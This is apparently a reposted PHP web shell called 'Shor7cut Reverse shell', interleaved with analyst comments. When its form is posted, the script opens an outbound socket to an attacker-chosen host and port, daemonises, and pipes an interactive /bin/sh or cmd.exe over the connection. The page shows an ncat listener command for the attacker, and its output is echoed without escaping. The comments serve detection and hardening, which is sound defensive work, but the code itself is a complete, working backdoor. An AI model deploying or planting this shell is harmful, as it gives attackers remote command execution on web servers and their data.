shor7cut

Shor7cut Reverse shell

Oct 9th, 2015
<?php
/*
SHOR7CUT | BUG7SEC
*/
// Analyst summary: single-file PHP web shell of the "reverse shell" type. A POST of the
// form further down makes the web server open an outbound TCP connection and attach a
// command interpreter to it. No authentication or access check is visible anywhere in
// the file, so anyone who can request it can trigger it.
// Static strings useful for web-root scanning: the "SHOR7CUT | BUG7SEC" banner, the page
// title "Shor7cut Reverse shell", the "pesan" query parameter and the ".[LOG]" markers.

// Turns off all PHP error reporting for this request, so failures are not reported.
error_reporting(0);
// Coarse OS label taken from PHP_OS; in the visible code it is only printed in the
// SYS INFO panel of the HTML page.
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$os = "Windows";
}else{
$os = "Linux";
}
   // Picks the requester's address, preferring the Client-IP and X-Forwarded-For request
   // headers over REMOTE_ADDR. Both headers are supplied by the client, and the value is
   // later written into the form and the SYS INFO panel without escaping.
   if (!empty($_SERVER['HTTP_CLIENT_IP'])){
        $ipaddress=$_SERVER['HTTP_CLIENT_IP'];
    }elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ipaddress=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ipaddress=$_SERVER['REMOTE_ADDR'];
    }
/* ---------------------------- */
// Removes PHP's execution time limit so the request handler can run indefinitely.
set_time_limit (0);
// Everything in this branch runs when the form's "submit" field is posted. Nothing
// before this point checks who is making the request.
if($_POST['submit']){
$VERSION = "1.0";
// Destination host and port come straight from the POST body and are not validated
// before being handed to fsockopen() below.
$ip = $_POST['ip'];
$port = $_POST['port'];
// Maximum number of bytes moved per fread() in the relay loop.
$chunk_size = 1400;
$write_a = null;
$error_a = null;
// Command line given to proc_open(): cmd.exe on Windows; elsewhere `uname -a`, `w` and
// `id` followed by an interactive /bin/sh. For detection, these show up as child
// processes of the web server / PHP worker account.
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$shell = "C:\\Windows\\system32\\cmd.exe";
}else{
$shell = "uname -a; w; id; /bin/sh -i";
}
$daemon = 0;
// Debug output is hard-coded off, so the print() calls guarded by $debug never run.
$debug = 0;
// When the pcntl extension is present the script forks: the parent exits immediately and
// the child calls posix_setsid() to start its own session. The child therefore keeps
// running in a session separate from the worker that handled the request.
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();

    if ($pid == -1) {
        print("ERROR: Can't fork");
        exit(1);
    }

    // Non-zero $pid means this is the parent process; it ends here.
    if ($pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        print("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    // Message text is Indonesian: "failed to daemonise, this is not fatal". The HTML
    // fragment is carried back to the page in the `pesan` query parameter of a redirect.
    $pesan.= "<font color=red>.[LOG]Gagal ke daemonise , ini tidak fatal.</font><br>";
    header("Location: ?pesan=$pesan");
}
// Moves to the filesystem root and clears the umask.
chdir("/");umask(0);
// Outbound TCP connection from the web server to the posted host:port, 30 s timeout.
// Egress filtering on web servers and alerting on outbound connections made by the
// PHP/web-server account are the network-side controls for this step.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    print("$errstr ($errno)");
    exit(1);
}
// stdin, stdout and stderr of the spawned process are each exposed as a pipe.
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);

// Spawns the command interpreter. proc_open, fsockopen and pcntl_fork are candidates for
// php.ini `disable_functions` on hosts that do not need them.
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    // Indonesian: "cannot load shell".
    $pesan.= "<font color=red>.[LOG]Tidak bisa memuat shell.</font><br>";
    header("Location: ?pesan=$pesan");
    exit(1);
}
// All three pipes and the socket are switched to non-blocking mode.
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
    // Indonesian: "reverse shell succeeded to $ip:$port". The posted ip/port values are
    // interpolated into the redirect URL as-is.
    $pesan.= "<font color=white>.[LOG]reverse shell berhasil ke $ip:$port.</font><br>";
    header("Location: ?pesan=$pesan");

// Relay loop. $is is incremented on every pass, so the loop condition never becomes
// false; the loop only ends through one of the feof() breaks below.
$is = 1;
for ($i=0; $i <$is; $i++) {
    if (feof($sock)) {
    // Indonesian: "shell connection lost".
    $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
    header("Location: ?pesan=$pesan");
        break;
    }
    if (feof($pipes[1])) {
    $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
    header("Location: ?pesan=$pesan");
        break;
    }
    // Waits (no timeout) until the socket or one of the process output pipes is readable.
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    // Bytes received on the socket are written to the process's stdin.
    if (in_array($sock, $read_a)) {
        if ($debug) print("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) print("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    // Process stdout is written back to the socket.
    if (in_array($pipes[1], $read_a)) {
        if ($debug) print("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) print("STDOUT: $input");
        fwrite($sock, $input);
    }
    // Process stderr is written back to the socket as well.
    if (in_array($pipes[2], $read_a)) {
        if ($debug) print("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) print("STDERR: $input");
        fwrite($sock, $input);
    }
flush();
    ob_flush();
    $is++;
}

// Teardown once either side has closed.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Helper that would append $string to the `pesan` redirect message when not daemonised.
// It is defined here but not called anywhere in the visible code.
function printit ($string) {
    if (!$daemon) {
    $pesan.= "<font color=red>.[LOG]$string.</font><br>";
    header("Location: ?pesan=$pesan");
    }
}
}else{
?>
<!DOCTYPE html>
<html>
<head>
        <title>Shor7cut Reverse shell</title>
        <link rel='shortcut icon' type='image/x-icon' href='http://s24.postimg.org/glkiiddg5/frog_152630_1280.png' />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
        <meta name="description" content="Shor7cut Reverse shell">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <style type="text/css">
        body {
    background: black;
    color: #00FF00;
    font-family: monospace;
}

.accessGranted {
    position: absolute;
    top: 200px;
    background: #333;
    padding: 20px;
    border: 1px solid #999;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}

.accessDenied {
    position: absolute;
    top: 200px;
    color: #F00;
    background: #511;
    padding: 20px;
    border: 1px solid #F00;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}
#content-center {
    width: 400px;
    padding: 0px 10px 10px 10px;
    width: 800px;
    margin: 0 auto;
}
#content-left {
margin: 0 auto;
     text-align: left;
}
#content-right {
margin: 0 auto;
     text-align: right;
}
input,select,textarea{
    border:0;
    border:1px solid #900;
    background:black;
    margin:0;
        color: white;

    padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
    background:black;
        color: red;

    border:1px solid #f00;
}
                        a{ text-decoration:none; color:red;}
</style>
</head>
<body>
<div id="content-center">
<pre>
__________                                                .__           .__  .__  
\______   \ _______  __ ___________  ______ ____     _____|  |__   ____ |  | |  |  
 |       _// __ \  \/ // __ \_  __ \/  ___// __ \   /  ___/  |  \_/ __ \|  | |  |  
 |    |   \  ___/\   /\  ___/|  | \/\___ \\  ___/   \___ \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >\_/  \___  >__|  /____  >\___  > /____  >___|  /\___  >____/____/
        \/     \/          \/           \/     \/       \/     \/     \/          
</pre>
<form action="" method="POST">
IP Attacker : <input type="text" name="ip" value="<?= $ipaddress;?>">
<select name="port">
    <option value="3202">3202</option>
    <option value="1337">1337</option>
    <option value="3813">3813</option>
    <option value="4444">4444</option>
    <option value="70847">70847</option>
    <option value="1337">1337</option>
    <option value="6677">6677</option>
    <option value="1313">1313</option>
    <option value="130707">130707</option>
</select>
<!--
Port Attacker : <input type="text" name="port">
-->
<input type="hidden" name="run" value="1">
<input type="submit" name="submit" value=">>">
</form>
<?php
// The `pesan` query parameter is echoed into the page below with no escaping, so any
// markup placed in that parameter is rendered by the browser. The header-derived
// $ipaddress value is written into the form field above and the SYS INFO panel below
// in the same unescaped way.
if($_GET['pesan']){?>
<pre>
.-----------------[ LOG INFO ]-----------------.
<?= $_GET['pesan'];?>
.--------------------------------------------.-.
</pre>
<?php
}
?>



<pre>
.-----------------[ SYS INFO ]-------------------.
.[OS]           : <?= $os."\r\n";?>
.[IP Local]     : <?= $_SERVER['SERVER_ADDR']."/".gethostbyname($_SERVER['SERVER_NAME'])."\r\n";?>
.[IP Attacker]  : <?= $ipaddress."\r\n";?>
.------------------------------------------------.
. Reverse shell : Windows or Linux
.------------------------------------------------.
.------------------------------------------------.
. Command       : ncat -vv -n -l -p {port}
.------------------------------------------------.
SHOR7CUT | <font color="red">BUG</font><i class="fa fa-bug"></i><font color="white">7SEC</font> | Learn and become an expert
</pre>
</div>
</body>
</html>
<?php
// Closes the else-branch opened before the HTML: this page is only rendered when no
// `submit` field was posted.
}
?>